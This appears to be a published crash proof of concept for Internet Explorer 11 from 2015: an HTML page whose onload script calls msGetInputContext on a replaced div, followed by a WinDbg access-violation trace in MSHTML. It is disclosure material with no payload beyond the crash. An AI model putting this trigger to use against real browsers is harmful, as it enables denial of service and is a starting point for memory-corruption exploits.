<!--
# Exploit title: Microsoft Internet Explorer 11 Crash PoC
# Date: 07.06.2015
# Vulnerable version: 11 (newest at the time 11.0.9600.17801)
# Tested on: Windows 7/8.1
# Author: Pawel Wylecial
# http://howl.overflow.pl @h0wlu
-->
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<script>
function boom() {
var divA = document.createElement("div");
document.body.appendChild(divA);
try {
//divA.contentEditable = "true";
divA.outerHTML = "AAAA";
var context = divA['msGetInputContext']();
}
catch (exception) {
}
}
</script>
</head>
<body onload='boom();'>
</body>
</html>
<!--
(2534.480c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=0fa48f84 ecx=00000000 edx=0a433fb8 esi=00000000 edi=0fa48e98
eip=5f302e86 esp=0c9db5a4 ebp=0c9db5c8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
MSHTML!Tree::ElementNode::GetCElement:
5f302e86 f7410800001000 test dword ptr [ecx+8],100000h ds:002b:00000008=????????
-->